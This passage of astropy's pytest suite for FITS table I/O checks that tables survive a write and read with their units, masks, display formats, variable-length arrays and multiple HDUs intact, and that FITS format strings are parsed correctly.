simple_table\nfrom astropy.time import Time\nfrom astropy.units import allclose as quantity_allclose\nfrom astropy.units.format.fits import UnitScaleError\nfrom astropy.units.quantity import QuantityInfo\nfrom astropy.utils.data import get_pkg_data_filename\nfrom astropy.utils.exceptions import AstropyDeprecationWarning, AstropyUserWarning\nfrom astropy.utils.misc import _NOT_OVERWRITING_MSG_MATCH\n\n# FITS does not preserve precision, in_subfmt, and out_subfmt.\ntime_attrs = [\"value\", \"shape\", \"format\", \"scale\", \"location\"]\ncompare_attrs = {\n name: (time_attrs if isinstance(col, Time) else compare_attrs[name])\n for name, col in mixin_cols.items()\n}\n# FITS does not support multi-element location, array with object dtype,\n# or logarithmic quantities.\nunsupported_cols = {\n name: col\n for name, col in mixin_cols.items()\n if (\n isinstance(col, Time)\n and col.location.shape != ()\n or isinstance(col, np.ndarray)\n and col.dtype.kind == \"O\"\n or isinstance(col, u.LogQuantity)\n )\n}\nmixin_cols = {\n name: col for name, col in mixin_cols.items() if name not in unsupported_cols\n}\n\n\ndef equal_data(a, b):\n return all(np.all(a[name] == b[name]) for name in a.dtype.names)\n\n\nclass TestSingleTable:\n def setup_class(self):\n self.data = np.array(\n list(zip([1, 2, 3, 4], [\"a\", \"b\", \"c\", \"d\"], [2.3, 4.5, 6.7, 8.9])),\n dtype=[(\"a\", int), (\"b\", \"U1\"), (\"c\", float)],\n )\n\n def test_simple(self, tmp_path):\n filename = tmp_path / \"test_simple.fts\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n\n def test_simple_pathlib(self, tmp_path):\n filename = tmp_path / \"test_simple.fit\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n\n def test_simple_meta(self, tmp_path):\n filename = tmp_path / \"test_simple.fits\"\n t1 = Table(self.data)\n t1.meta[\"A\"] = 1\n t1.meta[\"B\"] = 2.3\n t1.meta[\"C\"] = \"spam\"\n t1.meta[\"comments\"] = [\"this\", \"is\", \"a\", \"long\", \"comment\"]\n t1.meta[\"HISTORY\"] = [\"first\", \"second\", \"third\"]\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n for key in t1.meta:\n if isinstance(t1.meta, list):\n for i in range(len(t1.meta[key])):\n assert t1.meta[key][i] == t2.meta[key][i]\n else:\n assert t1.meta[key] == t2.meta[key]\n\n def test_simple_meta_conflicting(self, tmp_path):\n filename = tmp_path / \"test_simple.fits\"\n t1 = Table(self.data)\n t1.meta[\"ttype1\"] = \"spam\"\n with pytest.warns(\n AstropyUserWarning,\n match=(\n \"Meta-data keyword ttype1 \"\n \"will be ignored since it conflicts with a FITS \"\n \"reserved keyword\"\n ),\n ) as w:\n t1.write(filename, overwrite=True)\n assert len(w) == 1\n\n def test_simple_noextension(self, tmp_path):\n \"\"\"\n Test that file type is recognized without extension\n \"\"\"\n filename = tmp_path / \"test_simple\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True, format=\"fits\")\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n\n @pytest.mark.parametrize(\"table_type\", (Table, QTable))\n def test_with_units(self, table_type, tmp_path):\n filename = tmp_path / \"test_with_units.fits\"\n t1 = table_type(self.data)\n t1[\"a\"].unit = u.m\n t1[\"c\"].unit = u.km / u.s\n t1.write(filename, overwrite=True)\n t2 = table_type.read(filename)\n assert equal_data(t1, t2)\n assert t2[\"a\"].unit == u.m\n assert t2[\"c\"].unit == u.km / u.s\n\n def 
test_with_custom_units_qtable(self, tmp_path):\n # Test only for QTable - for Table's Column, new units are dropped\n # (as is checked in test_write_drop_nonstandard_units).\n filename = tmp_path / \"test_with_units.fits\"\n unit = u.def_unit(\"bandpass_sol_lum\")\n t = QTable()\n t[\"l\"] = np.ones(5) * unit\n with pytest.warns(AstropyUserWarning) as w:\n t.write(filename, overwrite=True)\n assert len(w) == 1\n assert \"bandpass_sol_lum\" in str(w[0].message)\n # Just reading back, the data is fine but the unit is not recognized.\n with pytest.warns(\n u.UnitsWarning, match=\"'bandpass_sol_lum' did not parse\"\n ) as w:\n t2 = QTable.read(filename)\n assert len(w) == 1\n assert isinstance(t2[\"l\"].unit, u.UnrecognizedUnit)\n assert str(t2[\"l\"].unit) == \"bandpass_sol_lum\"\n assert np.all(t2[\"l\"].value == t[\"l\"].value)\n\n # But if we enable the unit, it should be recognized.\n with u.add_enabled_units(unit):\n t3 = QTable.read(filename)\n assert t3[\"l\"].unit is unit\n assert equal_data(t3, t)\n\n # Regression check for #8897; write used to fail when a custom\n # unit was enabled.\n with pytest.warns(AstropyUserWarning):\n t3.write(filename, overwrite=True)\n\n # It should also be possible to read the file in using a unit alias,\n # even to a unit that may not be the same.\n with u.set_enabled_aliases({\"bandpass_sol_lum\": u.Lsun}):\n t3 = QTable.read(filename)\n assert t3[\"l\"].unit is u.Lsun\n\n @pytest.mark.parametrize(\"table_type\", (Table, QTable))\n def test_read_with_unit_aliases(self, table_type):\n hdu = BinTableHDU(self.data)\n hdu.columns[0].unit = \"Angstroms\"\n hdu.columns[2].unit = \"ergs/(cm.s.Angstroms)\"\n with u.set_enabled_aliases({\"Angstroms\": u.AA, \"ergs\": u.erg}):\n t = table_type.read(hdu)\n assert t[\"a\"].unit == u.AA\n assert t[\"c\"].unit == u.erg / (u.cm * u.s * u.AA)\n\n @pytest.mark.parametrize(\"table_type\", (Table, QTable))\n def test_with_format(self, table_type, tmp_path):\n filename = tmp_path / \"test_with_format.fits\"\n t1 = table_type(self.data)\n t1[\"a\"].format = \"{:5d}\"\n t1[\"b\"].format = \"{:>20}\"\n t1[\"c\"].format = \"{:6.2f}\"\n t1.write(filename, overwrite=True)\n t2 = table_type.read(filename)\n assert equal_data(t1, t2)\n assert t2[\"a\"].format == \"{:5d}\"\n assert t2[\"b\"].format == \"{:>20}\"\n assert t2[\"c\"].format == \"{:6.2f}\"\n\n def test_masked(self, tmp_path):\n filename = tmp_path / \"test_masked.fits\"\n t1 = Table(self.data, masked=True)\n t1.mask[\"a\"] = [1, 0, 1, 0]\n t1.mask[\"b\"] = [1, 0, 0, 1]\n t1.mask[\"c\"] = [0, 1, 1, 0]\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert equal_data(t1, t2)\n assert np.all(t1[\"a\"].mask == t2[\"a\"].mask)\n assert np.all(t1[\"b\"].mask == t2[\"b\"].mask)\n assert np.all(t1[\"c\"].mask == t2[\"c\"].mask)\n\n @pytest.mark.parametrize(\"masked\", [True, False])\n def test_masked_nan(self, masked, tmp_path):\n \"\"\"Check that masked values by default are replaced by NaN.\n\n This should work for any shape and be independent of whether the\n Table is formally masked or not.\n\n \"\"\"\n filename = tmp_path / \"test_masked_nan.fits\"\n a = np.ma.MaskedArray([5.25, 8.5, 3.75, 6.25], mask=[1, 0, 1, 0])\n b = np.ma.MaskedArray([2.5, 4.5, 6.75, 8.875], mask=[1, 0, 0, 1], dtype=\"f4\")\n c = np.ma.stack([a, b], axis=-1)\n t1 = Table([a, b, c], names=[\"a\", \"b\", \"c\"], masked=masked)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert_array_equal(t2[\"a\"].data, [np.nan, 8.5, np.nan, 6.25])\n 
assert_array_equal(t2[\"b\"].data, [np.nan, 4.5, 6.75, np.nan])\n assert_array_equal(\n t2[\"c\"].data, np.stack([t2[\"a\"].data, t2[\"b\"].data], axis=-1)\n )\n assert np.all(t1[\"a\"].mask == t2[\"a\"].mask)\n assert np.all(t1[\"b\"].mask == t2[\"b\"].mask)\n assert np.all(t1[\"c\"].mask == t2[\"c\"].mask)\n\n def test_masked_serialize_data_mask(self, tmp_path):\n filename = tmp_path / \"test_masked_nan.fits\"\n a = np.ma.MaskedArray([5.25, 8.5, 3.75, 6.25], mask=[1, 0, 1, 0])\n b = np.ma.MaskedArray([2.5, 4.5, 6.75, 8.875], mask=[1, 0, 0, 1])\n c = np.ma.stack([a, b], axis=-1)\n t1 = Table([a, b, c], names=[\"a\", \"b\", \"c\"])\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename)\n assert_array_equal(t2[\"a\"].data, [5.25, 8.5, 3.75, 6.25])\n assert_array_equal(t2[\"b\"].data, [2.5, 4.5, 6.75, 8.875])\n assert_array_equal(\n t2[\"c\"].data, np.stack([t2[\"a\"].data, t2[\"b\"].data], axis=-1)\n )\n assert np.all(t1[\"a\"].mask == t2[\"a\"].mask)\n assert np.all(t1[\"b\"].mask == t2[\"b\"].mask)\n assert np.all(t1[\"c\"].mask == t2[\"c\"].mask)\n\n def test_read_from_fileobj(self, tmp_path):\n filename = tmp_path / \"test_read_from_fileobj.fits\"\n hdu = BinTableHDU(self.data)\n hdu.writeto(filename, overwrite=True)\n with open(filename, \"rb\") as f:\n t = Table.read(f)\n assert equal_data(t, self.data)\n\n def test_read_with_nonstandard_units(self):\n hdu = BinTableHDU(self.data)\n hdu.columns[0].unit = \"RADIANS\"\n hdu.columns[1].unit = \"spam\"\n hdu.columns[2].unit = \"millieggs\"\n with pytest.warns(u.UnitsWarning, match=\"did not parse as fits unit\"):\n t = Table.read(hdu)\n assert equal_data(t, self.data)\n\n @pytest.mark.parametrize(\"table_type\", (Table, QTable))\n def test_write_drop_nonstandard_units(self, table_type, tmp_path):\n # While we are generous on input (see above), we are strict on\n # output, dropping units not recognized by the fits standard.\n filename = tmp_path / \"test_nonstandard_units.fits\"\n spam = u.def_unit(\"spam\")\n t = table_type()\n t[\"a\"] = [1.0, 2.0, 3.0] * spam\n with pytest.warns(AstropyUserWarning, match=\"spam\") as w:\n t.write(filename)\n assert len(w) == 1\n if table_type is Table:\n assert \"cannot be recovered in reading. 
\" in str(w[0].message)\n else:\n assert \"lost to non-astropy fits readers\" in str(w[0].message)\n\n with fits.open(filename) as ff:\n hdu = ff[1]\n assert \"TUNIT1\" not in hdu.header\n\n def test_memmap(self, tmp_path):\n filename = tmp_path / \"test_simple.fts\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename, memmap=False)\n t3 = Table.read(filename, memmap=True)\n assert equal_data(t2, t3)\n # To avoid issues with open files, we need to remove references to\n # data that uses memory mapping and force the garbage collection\n del t1, t2, t3\n gc.collect()\n\n @pytest.mark.parametrize(\"memmap\", (False, True))\n def test_character_as_bytes(self, tmp_path, memmap):\n filename = tmp_path / \"test_simple.fts\"\n t1 = Table(self.data)\n t1.write(filename, overwrite=True)\n t2 = Table.read(filename, character_as_bytes=False, memmap=memmap)\n t3 = Table.read(filename, character_as_bytes=True, memmap=memmap)\n assert t2[\"b\"].dtype.kind == \"U\"\n assert t3[\"b\"].dtype.kind == \"S\"\n assert equal_data(t2, t3)\n # To avoid issues with open files, we need to remove references to\n # data that uses memory mapping and force the garbage collection\n del t1, t2, t3\n gc.collect()\n\n def test_oned_single_element(self, tmp_path):\n filename = tmp_path / \"test_oned_single_element.fits\"\n table = Table({\"x\": [[1], [2]]})\n table.write(filename, overwrite=True)\n\n read = Table.read(filename)\n assert read[\"x\"].shape == (2, 1)\n assert len(read[\"x\"][0]) == 1\n\n def test_write_append(self, tmp_path):\n t = Table(self.data)\n hdu = table_to_hdu(t)\n\n def check_equal(filename, expected, start_from=1):\n with fits.open(filename) as hdu_list:\n assert len(hdu_list) == expected\n for hdu_table in hdu_list[start_from:]:\n assert hdu_table.header == hdu.header\n assert np.all(hdu_table.data == hdu.data)\n\n filename = tmp_path / \"test_write_append.fits\"\n t.write(filename, append=True)\n t.write(filename, append=True)\n check_equal(filename, 3)\n\n # Check the overwrite works correctly.\n t.write(filename, append=True, overwrite=True)\n t.write(filename, append=True)\n check_equal(filename, 3)\n\n # Normal write, check it's not appending.\n t.write(filename, overwrite=True)\n t.write(filename, overwrite=True)\n check_equal(filename, 2)\n\n # Now write followed by append, with different shaped tables.\n t2 = Table(np.array([1, 2]))\n t2.write(filename, overwrite=True)\n t.write(filename, append=True)\n check_equal(filename, 3, start_from=2)\n assert equal_data(t2, Table.read(filename, hdu=1))\n\n def test_write_overwrite(self, tmp_path):\n t = Table(self.data)\n filename = tmp_path / \"test_write_overwrite.fits\"\n t.write(filename)\n with pytest.raises(OSError, match=_NOT_OVERWRITING_MSG_MATCH):\n t.write(filename)\n t.write(filename, overwrite=True)\n\n def test_mask_nans_on_read(self, tmp_path):\n filename = tmp_path / \"test_inexact_format_parse_on_read.fits\"\n c1 = fits.Column(name=\"a\", array=np.array([1, 2, np.nan]), format=\"E\")\n table_hdu = fits.TableHDU.from_columns([c1])\n table_hdu.writeto(filename)\n\n tab = Table.read(filename)\n assert any(tab.mask)\n assert tab.mask[2]\n\n tab = Table.read(filename, mask_invalid=False)\n assert tab.mask is None\n\n # using memmap also deactivate the masking\n tab = Table.read(filename, memmap=True)\n assert tab.mask is None\n\n def test_mask_null_on_read(self, tmp_path):\n filename = tmp_path / \"test_null_format_parse_on_read.fits\"\n col = fits.Column(\n name=\"a\",\n array=np.array([1, 2, 99, 
60000], dtype=\"u2\"),\n format=\"I\",\n null=99,\n bzero=32768,\n )\n bin_table_hdu = fits.BinTableHDU.from_columns([col])\n bin_table_hdu.writeto(filename, overwrite=True)\n\n tab = Table.read(filename)\n assert any(tab.mask)\n assert tab.mask[2]\n\n def test_mask_str_on_read(self, tmp_path):\n filename = tmp_path / \"test_null_format_parse_on_read.fits\"\n col = fits.Column(\n name=\"a\", array=np.array([b\"foo\", b\"bar\", b\"\"], dtype=\"|S3\"), format=\"A3\"\n )\n bin_table_hdu = fits.BinTableHDU.from_columns([col])\n bin_table_hdu.writeto(filename, overwrite=True)\n\n tab = Table.read(filename)\n assert any(tab.mask)\n assert tab.mask[2]\n\n tab = Table.read(filename, mask_invalid=False)\n assert tab.mask is None\n\n def test_heterogeneous_VLA_tables(self, tmp_path):\n \"\"\"\n Check the behaviour of heterogeneous VLA object.\n \"\"\"\n filename = tmp_path / \"test_table_object.fits\"\n msg = \"Column 'col1' contains unsupported object types or mixed types: \"\n\n # The column format fix the type of the arrays in the VLF object.\n a = np.array([45, 30])\n b = np.array([11.0, 12.0, 13])\n var = np.array([a, b], dtype=object)\n tab = Table({\"col1\": var})\n with pytest.raises(TypeError, match=msg):\n tab.write(filename)\n\n # Strings in the VLF object can't be added to the table\n a = np.array([\"five\", \"thirty\"])\n b = np.array([11.0, 12.0, 13])\n var = np.array([a, b], dtype=object)\n with pytest.raises(TypeError, match=msg):\n tab.write(filename)\n\n def test_write_object_tables_with_unified(self, tmp_path):\n \"\"\"\n Write objects with the unified I/O interface.\n See https://github.com/astropy/astropy/issues/1906\n \"\"\"\n filename = tmp_path / \"test_table_object.fits\"\n msg = r\"Column 'col1' contains unsupported object types or mixed types: {dtype\\('O'\\)}\"\n # Make a FITS table with an object column\n tab = Table({\"col1\": [None]})\n with pytest.raises(TypeError, match=msg):\n tab.write(filename)\n\n def test_write_VLA_tables_with_unified(self, tmp_path):\n \"\"\"\n Write VLA objects with the unified I/O interface.\n See https://github.com/astropy/astropy/issues/11323\n \"\"\"\n\n filename = tmp_path / \"test_table_VLA.fits\"\n # Make a FITS table with a variable-length array column\n a = np.array([45, 30])\n b = np.array([11, 12, 13])\n c = np.array([45, 55, 65, 75])\n var = np.array([a, b, c], dtype=object)\n\n tabw = Table({\"col1\": var})\n tabw.write(filename)\n\n tab = Table.read(filename)\n assert np.array_equal(tab[0][\"col1\"], np.array([45, 30]))\n assert np.array_equal(tab[1][\"col1\"], np.array([11, 12, 13]))\n assert np.array_equal(tab[2][\"col1\"], np.array([45, 55, 65, 75]))\n\n\nclass TestMultipleHDU:\n def setup_class(self):\n self.data1 = np.array(\n list(zip([1, 2, 3, 4], [\"a\", \"b\", \"c\", \"d\"], [2.3, 4.5, 6.7, 8.9])),\n dtype=[(\"a\", int), (\"b\", \"U1\"), (\"c\", float)],\n )\n self.data2 = np.array(\n list(zip([1.4, 2.3, 3.2, 4.7], [2.3, 4.5, 6.7, 8.9])),\n dtype=[(\"p\", float), (\"q\", float)],\n )\n self.data3 = np.array(\n list(zip([1, 2, 3, 4], [2.3, 4.5, 6.7, 8.9])),\n dtype=[(\"A\", int), (\"B\", float)],\n )\n hdu0 = PrimaryHDU()\n hdu1 = BinTableHDU(self.data1, name=\"first\")\n hdu2 = BinTableHDU(self.data2, name=\"second\")\n hdu3 = ImageHDU(np.ones((3, 3)), name=\"third\")\n hdu4 = BinTableHDU(self.data3)\n\n self.hdus = HDUList([hdu0, hdu1, hdu2, hdu3, hdu4])\n self.hdusb = HDUList([hdu0, hdu3, hdu2, hdu1])\n self.hdus3 = HDUList([hdu0, hdu3, hdu2])\n self.hdus2 = HDUList([hdu0, hdu1, hdu3])\n self.hdus1 = HDUList([hdu0, 
hdu1])\n\n def teardown_class(self):\n del self.hdus\n\n def setup_method(self, method):\n warnings.filterwarnings(\"always\")\n\n def test_read(self, tmp_path):\n filename = tmp_path / \"test_read.fits\"\n self.hdus.writeto(filename)\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables \"\n r\"are present, reading in first available \"\n r\"table \\(hdu=1\\)\",\n ):\n t = Table.read(filename)\n assert equal_data(t, self.data1)\n\n filename = tmp_path / \"test_read_2.fits\"\n self.hdusb.writeto(filename)\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables \"\n r\"are present, reading in first available \"\n r\"table \\(hdu=2\\)\",\n ):\n t3 = Table.read(filename)\n assert equal_data(t3, self.data2)\n\n def test_read_with_hdu_0(self, tmp_path):\n filename = tmp_path / \"test_read_with_hdu_0.fits\"\n self.hdus.writeto(filename)\n with pytest.raises(ValueError) as exc:\n Table.read(filename, hdu=0)\n assert exc.value.args[0] == \"No table found in hdu=0\"\n\n @pytest.mark.parametrize(\"hdu\", [1, \"first\"])\n def test_read_with_hdu_1(self, tmp_path, hdu):\n filename = tmp_path / \"test_read_with_hdu_1.fits\"\n self.hdus.writeto(filename)\n t = Table.read(filename, hdu=hdu)\n assert equal_data(t, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [2, \"second\"])\n def test_read_with_hdu_2(self, tmp_path, hdu):\n filename = tmp_path / \"test_read_with_hdu_2.fits\"\n self.hdus.writeto(filename)\n t = Table.read(filename, hdu=hdu)\n assert equal_data(t, self.data2)\n\n @pytest.mark.parametrize(\"hdu\", [3, \"third\"])\n def test_read_with_hdu_3(self, tmp_path, hdu):\n filename = tmp_path / \"test_read_with_hdu_3.fits\"\n self.hdus.writeto(filename)\n with pytest.raises(ValueError, match=\"No table found in hdu=3\"):\n Table.read(filename, hdu=hdu)\n\n def test_read_with_hdu_4(self, tmp_path):\n filename = tmp_path / \"test_read_with_hdu_4.fits\"\n self.hdus.writeto(filename)\n t = Table.read(filename, hdu=4)\n assert equal_data(t, self.data3)\n\n @pytest.mark.parametrize(\"hdu\", [2, 3, \"1\", \"second\", \"\"])\n def test_read_with_hdu_missing(self, tmp_path, hdu):\n filename = tmp_path / \"test_warn_with_hdu_1.fits\"\n self.hdus1.writeto(filename)\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"Specified hdu={hdu} not found, \"\n r\"reading in first available table \\(hdu=1\\)\",\n ):\n t1 = Table.read(filename, hdu=hdu)\n assert equal_data(t1, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [0, 2, \"third\"])\n def test_read_with_hdu_warning(self, tmp_path, hdu):\n filename = tmp_path / \"test_warn_with_hdu_2.fits\"\n self.hdus2.writeto(filename)\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"No table found in specified hdu={hdu}, \"\n r\"reading in first available table \\(hdu=1\\)\",\n ):\n t2 = Table.read(filename, hdu=hdu)\n assert equal_data(t2, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [0, 1, \"third\"])\n def test_read_in_last_hdu(self, tmp_path, hdu):\n filename = tmp_path / \"test_warn_with_hdu_3.fits\"\n self.hdus3.writeto(filename)\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"No table found in specified hdu={hdu}, \"\n r\"reading in first available table \\(hdu=2\\)\",\n ):\n t3 = Table.read(filename, hdu=hdu)\n assert equal_data(t3, self.data2)\n\n def test_read_from_hdulist(self):\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables \"\n r\"are present, reading in first available \"\n r\"table 
\\(hdu=1\\)\",\n ):\n t = Table.read(self.hdus)\n assert equal_data(t, self.data1)\n\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables \"\n r\"are present, reading in first available \"\n r\"table \\(hdu=2\\)\",\n ):\n t3 = Table.read(self.hdusb)\n assert equal_data(t3, self.data2)\n\n def test_read_from_hdulist_with_hdu_0(self):\n with pytest.raises(ValueError) as exc:\n Table.read(self.hdus, hdu=0)\n assert exc.value.args[0] == \"No table found in hdu=0\"\n\n @pytest.mark.parametrize(\"hdu\", [1, \"first\", None])\n def test_read_from_hdulist_with_single_table(self, hdu):\n t = Table.read(self.hdus1, hdu=hdu)\n assert equal_data(t, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [1, \"first\"])\n def test_read_from_hdulist_with_hdu_1(self, hdu):\n t = Table.read(self.hdus, hdu=hdu)\n assert equal_data(t, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [2, \"second\"])\n def test_read_from_hdulist_with_hdu_2(self, hdu):\n t = Table.read(self.hdus, hdu=hdu)\n assert equal_data(t, self.data2)\n\n @pytest.mark.parametrize(\"hdu\", [3, \"third\"])\n def test_read_from_hdulist_with_hdu_3(self, hdu):\n with pytest.raises(ValueError, match=\"No table found in hdu=3\"):\n Table.read(self.hdus, hdu=hdu)\n\n @pytest.mark.parametrize(\"hdu\", [0, 2, \"third\"])\n def test_read_from_hdulist_with_hdu_warning(self, hdu):\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"No table found in specified hdu={hdu}, \"\n r\"reading in first available table \\(hdu=1\\)\",\n ):\n t2 = Table.read(self.hdus2, hdu=hdu)\n assert equal_data(t2, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [2, 3, \"1\", \"second\", \"\"])\n def test_read_from_hdulist_with_hdu_missing(self, hdu):\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"Specified hdu={hdu} not found, \"\n r\"reading in first available table \\(hdu=1\\)\",\n ):\n t1 = Table.read(self.hdus1, hdu=hdu)\n assert equal_data(t1, self.data1)\n\n @pytest.mark.parametrize(\"hdu\", [0, 1, \"third\"])\n def test_read_from_hdulist_in_last_hdu(self, hdu):\n with pytest.warns(\n AstropyDeprecationWarning,\n match=rf\"No table found in specified hdu={hdu}, \"\n r\"reading in first available table \\(hdu=2\\)\",\n ):\n t3 = Table.read(self.hdus3, hdu=hdu)\n assert equal_data(t3, self.data2)\n\n @pytest.mark.parametrize(\"hdu\", [None, 1, \"first\"])\n def test_read_from_single_hdu(self, hdu):\n t = Table.read(self.hdus[1])\n assert equal_data(t, self.data1)\n\n\ndef test_masking_regression_1795():\n \"\"\"\n Regression test for #1795 - this bug originally caused columns where TNULL\n was not defined to have their first element masked.\n \"\"\"\n t = Table.read(get_pkg_data_filename(\"data/tb.fits\"))\n assert np.all(t[\"c1\"].mask == np.array([False, False]))\n assert not hasattr(t[\"c2\"], \"mask\")\n assert not hasattr(t[\"c3\"], \"mask\")\n assert not hasattr(t[\"c4\"], \"mask\")\n assert np.all(t[\"c1\"].data == np.array([1, 2]))\n assert np.all(t[\"c2\"].data == np.array([b\"abc\", b\"xy \"]))\n assert_allclose(t[\"c3\"].data, np.array([3.70000007153, 6.6999997139]))\n assert np.all(t[\"c4\"].data == np.array([False, True]))\n\n\ndef test_scale_error():\n a = [1, 4, 5]\n b = [2.0, 5.0, 8.2]\n c = [\"x\", \"y\", \"z\"]\n t = Table([a, b, c], names=(\"a\", \"b\", \"c\"), meta={\"name\": \"first table\"})\n t[\"a\"].unit = \"1.2\"\n with pytest.raises(\n UnitScaleError,\n match=r\"The column 'a' could not be \"\n r\"stored in FITS format because it has a scale '\\(1\\.2\\)'\"\n r\" that is not 
recognized by the FITS standard\\. Either \"\n r\"scale the data or change the units\\.\",\n ):\n t.write(\"t.fits\", format=\"fits\", overwrite=True)\n\n\n@pytest.mark.parametrize(\n \"tdisp_str, format_return\",\n [\n (\"EN10.5\", (\"EN\", \"10\", \"5\", None)),\n (\"F6.2\", (\"F\", \"6\", \"2\", None)),\n (\"B5.10\", (\"B\", \"5\", \"10\", None)),\n (\"E10.5E3\", (\"E\", \"10\", \"5\", \"3\")),\n (\"A21\", (\"A\", \"21\", None, None)),\n ],\n)\ndef test_parse_tdisp_format(tdisp_str, format_return):\n assert _parse_tdisp_format(tdisp_str) == format_return\n\n\n@pytest.mark.parametrize(\n \"tdisp_str, format_str_return\",\n [\n (\"G15.4E2\", \"{:15.4g}\"),\n (\"Z5.10\", \"{:5x}\"),\n (\"I6.5\", \"{:6d}\"),\n (\"L8\", \"{:>8}\"),\n (\"E20.7\", \"{:20.7e}\"),\n ],\n)\ndef test_fortran_to_python_format(tdisp_str, format_str_return):\n assert _fortran_to_python_format(tdisp_str) == format_str_return\n\n\n@pytest.mark.parametrize(\n \"fmt_str, tdisp_str\",\n [\n (\"{:3d}\", \"I3\"),\n (\"3d\", \"I3\"),\n (\"7.3f\", \"F7.3\"),\n (\"{:>4}\", \"A4\"),\n (\"{:7.4f}\", \"F7.4\"),\n (\"%5.3g\", \"G5.3\"),\n (\"%10s\", \"A10\"),\n (\"%.4f\", \"F13.4\"),\n ],\n)\ndef test_python_to_tdisp(fmt_str, tdisp_str):\n assert python_to_tdisp(fmt_str) == tdisp_str\n\n\ndef test_logical_python_to_tdisp():\n assert python_to_tdisp(\"{:>7}\", logical_dtype=True) == \"L7\"\n\n\ndef test_bool_column(tmp_path):\n \"\"\"\n Regression test for https://github.com/astropy/astropy/issues/1953\n\n Ensures that Table columns of bools are properly written to a FITS table.\n \"\"\"\n\n arr = np.ones(5, dtype=bool)\n arr[::2] = False\n\n t = Table([arr])\n t.write(tmp_path / \"test.fits\", overwrite=True)\n\n with fits.open(tmp_path / \"test.fits\") as hdul:\n assert hdul[1].data[\"col0\"].dtype == np.dtype(\"bool\")\n assert np.all(hdul[1].data[\"col0\"] == arr)\n\n\ndef test_unicode_column(tmp_path):\n \"\"\"\n Test that a column of unicode strings is still written as one\n byte-per-character in the FITS table (so long as the column can be ASCII\n encoded).\n\n Regression test for one of the issues fixed in\n https://github.com/astropy/astropy/pull/4228\n \"\"\"\n\n t = Table([np.array([\"a\", \"b\", \"cd\"])])\n t.write(tmp_path / \"test.fits\", overwrite=True)\n\n with fits.open(tmp_path / \"test.fits\") as hdul:\n assert np.all(hdul[1].data[\"col0\"] == [\"a\", \"b\", \"cd\"])\n assert hdul[1].header[\"TFORM1\"] == \"2A\"\n\n t2 = Table([np.array([\"\\N{SNOWMAN}\"])])\n\n with pytest.raises(UnicodeEncodeError):\n t2.write(tmp_path / \"test.fits\", overwrite=True)\n\n\ndef test_unit_warnings_read_write(tmp_path):\n filename = tmp_path / \"test_unit.fits\"\n t1 = Table([[1, 2], [3, 4]], names=[\"a\", \"b\"])\n t1[\"a\"].unit = \"m/s\"\n t1[\"b\"].unit = \"not-a-unit\"\n\n with pytest.warns(\n u.UnitsWarning, match=\"'not-a-unit' did not parse as fits unit\"\n ) as w:\n t1.write(filename, overwrite=True)\n assert len(w) == 1\n\n with pytest.warns(\n u.UnitsWarning, match=\"'not-a-unit' did not parse as fits unit\"\n ) as w:\n Table.read(filename, hdu=1)\n\n\ndef test_convert_comment_convention():\n \"\"\"\n Regression test for https://github.com/astropy/astropy/issues/6079\n \"\"\"\n filename = get_pkg_data_filename(\"data/stddata.fits\")\n with pytest.warns(\n AstropyUserWarning,\n match=r\"hdu= was not specified but multiple tables are present\",\n ):\n t = Table.read(filename)\n\n assert t.meta[\"comments\"] == [\n \"\",\n \" *** End of mandatory fields ***\",\n \"\",\n \"\",\n \" *** Column names ***\",\n \"\",\n \"\",\n 
\" *** Column formats ***\",\n \"\",\n ]\n\n\ndef assert_objects_equal(obj1, obj2, attrs, compare_class=True):\n if compare_class:\n assert obj1.__class__ is obj2.__class__\n\n info_attrs = [\n \"info.name\",\n \"info.format\",\n \"info.unit\",\n \"info.description\",\n \"info.meta\",\n \"info.dtype\",\n ]\n for attr in attrs + info_attrs:\n a1 = obj1\n a2 = obj2\n for subattr in attr.split(\".\"):\n try:\n a1 = getattr(a1, subattr)\n a2 = getattr(a2, subattr)\n except AttributeError:\n a1 = a1[subattr]\n a2 = a2[subattr]\n\n # Mixin info.meta can None instead of empty OrderedDict(), #6720 would\n # fix this.\n if attr == \"info.meta\":\n if a1 is None:\n a1 = {}\n if a2 is None:\n a2 = {}\n\n if isinstance(a1, np.ndarray) and a1.dtype.kind == \"f\":\n assert quantity_allclose(a1, a2, rtol=1e-15)\n elif isinstance(a1, np.dtype):\n # FITS does not perfectly preserve dtype: byte order can change, and\n # unicode gets stored as bytes. So, we just check safe casting, to\n # ensure we do not, e.g., accidentally change integer to float, etc.\n assert np.can_cast(a2, a1, casting=\"safe\")\n else:\n assert np.all(a1 == a2)\n\n\ndef test_fits_mixins_qtable_to_table(tmp_path):\n \"\"\"Test writing as QTable and reading as Table. Ensure correct classes\n come out.\n \"\"\"\n filename = tmp_path / \"test_simple.fits\"\n\n names = sorted(mixin_cols)\n\n t = QTable([mixin_cols[name] for name in names], names=names)\n t.write(filename, format=\"fits\")\n t2 = Table.read(filename, format=\"fits\", astropy_native=True)\n\n assert t.colnames == t2.colnames\n\n for name, col in t.columns.items():\n col2 = t2[name]\n\n # Special-case Time, which does not yet support round-tripping\n # the format.\n if isinstance(col2, 